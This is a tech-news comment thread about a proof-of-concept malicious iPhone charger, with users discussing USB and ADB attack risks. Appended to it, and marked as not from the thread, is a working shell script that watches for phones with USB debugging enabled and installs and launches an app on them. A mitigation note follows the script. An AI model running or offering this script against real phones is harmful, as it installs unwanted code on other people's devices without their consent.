Researchers Infect iOS Devices With Malware Via Malicious Charger
Sparrowvsrevolution writes "At the upcoming Black Hat security conference in late July, three researchers at the Georgia Institute of Technology plan to show off a proof-of-concept charger that they say can be used to invisibly install malware on a device running the latest version of Apple's iOS. A description of their talk posted to the conference website describes how they were able to install whatever malware they wished on an Apple device within a minute of the user plugging it into their malicious charger, which they're calling 'Mactans' after the scientific name of a Black Widow spider. The malware-loaded USB plug is built around an open-source single-board computer known as a BeagleBoard, sold by Texas Instruments for a retail price of around $45. The researchers have contacted Apple about their exploit but haven't heard back from the company and aren't sharing more details of their hack until they do."
GP has already provided you with a potential scenario - presumably the chargers Vodafone fitted in London taxis were a USB socket and/or an iPod dock mounted in the passenger section of the taxi. The BeagleBoard could be anywhere in the taxi.
Plus, it's a proof of concept. It could certainly be miniaturised.
I doubt that any other smartphone OS is immune to this kind of attack, however.
The prototype being based on a big developer board means nothing. The exploit could be easily replicated on smaller boards that would fit just fine in regular chargers.
This is not an "open the device and latch on to some henceforth unprotected internal signal" attack vector. Attaching the phone to someone else's charger is not unusual behavior.
It's based on a BeagleBoard, which is larger than a business card. It's going to be tough to fool people into using a charger that looks like it swallowed half your iPhone.
Sure they will. In Spain there are charging kiosks with coin slots and cables going somewhere you can't see them and people use those all of the time. You forget that in most public charging situations you don't want just anyone to be able to unplug the thing and walk away with it.
Well, there's a continuum.
Sneaking into someone's office and putting a keylogger inline with their keyboard cable is an example of physical access making black-hat hacking easy.
Sneaking into the same office and plugging a PwnPlug or similar into the physical network is another example.
Those two are increasingly far from actually directly looking at filesystem blocks, but put you at an advantage compared to someone trying to get to a system from the other side of a firewall.
Why would you think that? Have you never attached a smartphone to a USB host? Of course the USB data lines are connected, and of course any smartphone will respond to communication attempts from a USB host, so there is absolutely no reason why other phones should not be vulnerable to some form of attack via USB.
I don't know about you, but I can only use the USB port to charge my Android phone. Also, when I connect my Android phone to my computer I generally get access to the data contents of the phone (documents, music, pictures, etc.). It seems pretty trivial to devise a "charger" that steals or destroys data on any phone that connects to it.
Data is the real treasure and thus is also the real threat of damage, but AFAIK you can also use the Android Debug Bridge to install programs to connected phones.
The road to tyranny has always been paved with claims of necessity.
Mine's from a $5 (shipped) job from Hong Kong, charges quite fast. I assure you it's not licensed, knock-off Lightning cable and all.
I'm not sure what point you're trying to argue, but it sounds like you're a perfect candidate for a charger that distributes malware. How would you know if your current charger is not sending your data back to China?
"Our two-party system is like a bowl of shit looking at itself in a mirror." - Lewis Black
Yes, but not for charging. If you are paranoid you can buy or make a USB cable that is only for charging (data lines disconnected) and your charger will still operate normally and at full speed. If you make such a cable for your iOS device it will only charge at low speed.
This is also notable as an example of DRM gone bad and leading to a severe security problem.
const int one = 65536; (Silvermoon, Texture.cs)
SJW, n: "Someone I don't like, and by the way I'm a fuckwit" - AC
And in what way was it not obvious for the entire history of the iPhone that it could be reflashed through the USB?
There's a huge difference between reflashing something and gaining root to infect an existing install.
One is very obvious to the user because their phone is suddenly reflashed to some configuration that isn't the user's any more. The other could be incredibly subtle because there's no visible change to the user.
It's entirely possible that a similar attack could happen to Android devices as well (for example, run an ADB instance and have it auto-install and execute something whenever it detects a device with debugging enabled. My phone would be vulnerable to this kind of attack, because for convenience, I've got it set up to auto-enter debugging mode whenever it plugs into a device. I'm willing to accept that risk, but I'm not an idiot that insists that the risk isn't there.)
Thing is, it's just another example of how that device that you insist is so damn impregnable because it's from mother Apple can, in fact, be easily exploited. All it takes is for someone to do it. Just because it hasn't happened in the wild *yet* (that you know of) doesn't make you any safer than anyone else.
--Jeremy
Jesus was a liberal
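The Android-side scenario raised in the two comments above (ADB can install programs on a connected phone; a host that auto-installs something whenever a device with debugging enabled shows up) as an added example. This is not code from the thread, from the Mactans researchers, or from the Android project; `payload.apk`, the package name `com.example.payload` and its `.Main` activity are placeholder assumptions, and the `adb devices` output fed to the demo is constructed. The check a practitioner wants is the device state column: since Android 4.2.2 a phone in the `unauthorized` state has not accepted the host's adb key, so `install` fails until the user taps "Allow" on the phone; only `device` state is usable without interaction.

```shell
#!/bin/sh
# Added example (not from the thread): a host that watches `adb devices` and
# installs and launches an app on any phone that enumerates with USB debugging
# enabled. payload.apk, com.example.payload and .Main are placeholder names.
#
# `adb devices` prints one header line, then "<serial><TAB><state>" per device.
# States: "device" (adb session up, host authorized), "unauthorized" (host key
# not yet accepted on the phone, Android 4.2.2+), "offline" (no session yet).

# adb_serials_in_state STATE: read `adb devices` output on stdin and print the
# serials currently in STATE, one per line.
adb_serials_in_state() {
    awk -v want="$1" 'NR > 1 && NF >= 2 && $2 == want { print $1 }'
}

# push_app SERIAL: install (replacing any existing copy) and start the
# placeholder app on one phone. Fails if the phone is not authorized.
push_app() {
    adb -s "$1" install -r payload.apk >/dev/null 2>&1 || return 1
    adb -s "$1" shell am start -n com.example.payload/.Main >/dev/null 2>&1
}

# poll_and_push: every 2 s, push to any newly seen authorized phone and report
# phones that have debugging on but have not accepted this host's key.
poll_and_push() {
    seen=""
    while :; do
        out=$(adb devices)
        for s in $(printf '%s\n' "$out" | adb_serials_in_state device); do
            case " $seen " in *" $s "*) continue ;; esac
            echo "pushing to $s"
            push_app "$s" && seen="$seen $s"
        done
        for s in $(printf '%s\n' "$out" | adb_serials_in_state unauthorized); do
            echo "$s: debugging enabled, but this host is not authorized"
        done
        sleep 2
    done
}

# demo: run the parser over a constructed `adb devices` listing (no adb needed)
# so the state filtering can be seen offline.
demo() {
    sample=$(printf 'List of devices attached\n0123456789ABCDEF\tdevice\nemulator-5554\tunauthorized\nZX1G2\toffline\n')
    echo "usable:      $(printf '%s\n' "$sample" | adb_serials_in_state device)"
    echo "needs Allow: $(printf '%s\n' "$sample" | adb_serials_in_state unauthorized)"
}

demo

# Only start the live loop when asked, e.g. RUN_POLL=1 sh mactans_android.sh
if [ "${RUN_POLL:-}" = 1 ]; then
    poll_and_push
fi
```

The mitigation is the same one the comment's author opted out of for convenience: leave USB debugging off, and when it is on, do not tap "Allow" on a prompt triggered by something you only meant to draw power from. A charge-only cable (data lines disconnected) prevents enumeration entirely, which is why the phone stays in no state at all rather than `unauthorized`.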